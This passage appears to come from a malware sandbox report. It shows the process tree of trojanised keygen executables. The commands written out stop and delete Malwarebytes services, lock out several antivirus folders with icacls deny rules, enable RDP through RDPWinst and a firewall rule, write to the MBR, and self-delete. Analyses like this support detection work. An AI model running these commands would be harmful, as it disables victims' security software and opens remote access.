        C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
        PID:2172
        • C:\Windows\SysWOW64\sc.exe
          sc config appidsvc start= auto
          PID:2248
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
        PID:2304
        • C:\Windows\SysWOW64\sc.exe
          sc config appmgmt start= auto
          PID:2404
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc delete swprv
        PID:2412
        • C:\Windows\SysWOW64\sc.exe
          sc delete swprv
          PID:2620
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc stop mbamservice
        PID:2652
        • C:\Windows\SysWOW64\sc.exe
          sc stop mbamservice
          PID:2860
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
        PID:2844
        • C:\Windows\SysWOW64\sc.exe
          sc stop bytefenceservice
          PID:2064
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
        PID:2080
        • C:\Windows\SysWOW64\sc.exe
          sc delete bytefenceservice
          PID:1552
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc delete mbamservice
        PID:2560
        • C:\Windows\SysWOW64\sc.exe
          sc delete mbamservice
          PID:1920
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc delete crmsvc
        PID:2692
        • C:\Windows\SysWOW64\sc.exe
          sc delete crmsvc
          PID:3028
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
        PID:2308
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set allprofiles state on
          PID:2952
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        PID:2868
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
          PID:2948
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        PID:2528
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
          PID:2968
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        PID:3012
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
          PID:3008
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        PID:3056
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
          PID:600
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
        PID:3032
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1068
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        PID:2760
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
          Modifies file permissions
          PID:2988
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
        PID:1332
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:844
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        PID:284
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
          Modifies file permissions
          PID:1920
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
        PID:2076
        • C:\Windows\SysWOW64\icacls.exe
          icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1944
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        PID:1688
        • C:\Windows\SysWOW64\icacls.exe
          icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
          Modifies file permissions
          PID:552
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
        PID:2256
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2576
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        PID:2716
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
          Modifies file permissions
          PID:2072
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
        PID:1644
        • C:\Windows\SysWOW64\icacls.exe
          icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1636
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        PID:2740
        • C:\Windows\SysWOW64\icacls.exe
          icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:2044
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
        PID:2476
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1772
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        PID:2764
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:1376
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
        PID:2104
        • C:\Windows\SysWOW64\icacls.exe
          icacls c:\programdata\Malwarebytes /deny Admin:(F)
          Modifies file permissions
          PID:1752
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
        PID:552
        • C:\Windows\SysWOW64\icacls.exe
          icacls c:\programdata\Malwarebytes /deny System:(F)
          Modifies file permissions
          PID:2588
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
        PID:1688
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\MB3Install /deny Admin:(F)
          Modifies file permissions
          PID:2988
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
        PID:2904
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\MB3Install /deny System:(F)
          Modifies file permissions
          PID:2836
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
        PID:800
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1476
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        PID:2864
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
          Modifies file permissions
          PID:3040
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
        PID:2552
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2592
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
        PID:2800
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3016
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
        PID:2084
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2532
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        PID:1688
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3028
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
        PID:1376
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2836
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
        PID:1076
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1844
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
        PID:1840
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2944
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
        PID:1604
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2112
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
        PID:2084
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2328
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
        PID:2196
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2156
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
        PID:1376
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2944
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
        PID:2212
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2844
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
        PID:2976
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2112
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
        PID:1976
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3424
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
        PID:1084
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3480
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
        PID:1376
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3540
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
        PID:1848
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3456
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
        PID:2396
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3704
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        PID:3000
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3616
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
        PID:3188
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3648
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        PID:3204
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3640
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
        PID:3244
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3716
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        PID:3284
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3520
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
        PID:3360
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3652
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        PID:3504
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3488
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
        PID:3684
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3464
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
        PID:3776
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2672
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
        PID:3876
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1236
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
        PID:3968
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:4060
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
        PID:4056
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:4080
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
        PID:1160
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1880
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
        PID:3200
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1720
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
        PID:3296
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3236
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
        PID:3768
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3756
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        PID:368
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:564
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
        PID:1520
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3880
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        PID:3188
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3296
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
        PID:3168
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3724
      • C:\Programdata\Install\utorrent.exe
        C:\Programdata\Install\utorrent.exe
        NTFS ADS
        PID:3920
        • C:\ProgramData\WindowsTask\azur.exe
          C:\ProgramData\WindowsTask\azur.exe
          Checks processor information in registry
          PID:4724
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
            PID:1172
            • C:\Windows\SysWOW64\timeout.exe
              C:\Windows\system32\timeout.exe 3
              Delays execution with timeout.exe
              PID:2524
        • C:\ProgramData\WindowsTask\system.exe
          C:\ProgramData\WindowsTask\system.exe
          PID:4860
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\Desktop\selfDel.bat" "
            PID:5880
        • C:\ProgramData\RDPWinst.exe
          C:\ProgramData\RDPWinst.exe -i
          Modifies WinLogon
          PID:2968
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
            PID:1192
      • C:\ProgramData\RealtekHD\taskhost.exe
        C:\ProgramData\RealtekHD\taskhost.exe
        PID:5440
      • C:\ProgramData\RealtekHD\taskhostw.exe
        C:\ProgramData\RealtekHD\taskhostw.exe
        PID:5396
    • C:\Users\Admin\Desktop\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
      "C:\Users\Admin\Desktop\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe"
      Executes dropped EXE
      PID:1116
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "
        Loads dropped DLL
        PID:2328
        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\intro.exe
          intro.exe 1O5ZF
          Executes dropped EXE
          Modifies system certificate store
          PID:2552
        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          Executes dropped EXE
          Loads dropped DLL
          PID:2580
          • C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe"
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of SetThreadContext
            PID:1416
            • C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe -txt -scanlocal -file:potato.dat
              Executes dropped EXE
              PID:2624
        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe
          keygen-step-1.exe
          Executes dropped EXE
          PID:2688
        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe
          keygen-step-3.exe
          Executes dropped EXE
          PID:2756
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"
            PID:2872
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              Runs ping.exe
              PID:2164
        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe
          keygen-step-4.exe
          Executes dropped EXE
          Loads dropped DLL
          Suspicious behavior: GetForegroundWindowSpam
          PID:2804
          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\002.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX4\002.exe"
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:3060
          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
            Executes dropped EXE
            Loads dropped DLL
            PID:436
            • C:\Users\Admin\AppData\Local\Temp\sibA11.tmp\0\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\sibA11.tmp\0\setup.exe" -s
              Executes dropped EXE
              PID:3264
              • C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe
                "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
                Writes to the Master Boot Record (MBR)
                Suspicious use of NtSetInformationThreadHideFromDebugger
                Modifies system certificate store
                PID:2952
                • C:\Windows\SysWOW64\msiexec.exe
                  msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                  Enumerates connected drives
                  Suspicious behavior: GetForegroundWindowSpam
                  Suspicious use of FindShellTrayWindow
                  PID:3188
                • C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
                  C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 0011 installp1
                  Writes to the Master Boot Record (MBR)
                  PID:3912
                  • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                    C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                    PID:4596
                  • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                    "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                    Writes to the Master Boot Record (MBR)
                    PID:2184
                  • C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe
                    C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent
                    PID:4108
                    • C:\Users\Admin\AppData\Local\Temp\is-B0QUR.tmp\1021C014A4C9A552.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-B0QUR.tmp\1021C014A4C9A552.tmp" /SL5="$60176,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent
                      PID:1944
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
                    PID:5956
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      Runs ping.exe
                      PID:4052
                • C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
                  C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 200 installp1
                  Writes to the Master Boot Record (MBR)
                  PID:3952
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    PID:1860
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      Kills process with taskkill
                      PID:2412
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
                    PID:4576
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      Runs ping.exe
                      PID:2672
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
                  PID:4196
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    Runs ping.exe
                    PID:4320
          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg2_2qua.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg2_2qua.exe"
            Modifies system certificate store
            PID:3268
    • C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
      "C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1248
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        PID:240
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
          intro.exe 1O5ZF
          Executes dropped EXE
          PID:996
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          Executes dropped EXE
          Loads dropped DLL
          Suspicious use of WriteProcessMemory
          PID:1320
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
            Executes dropped EXE
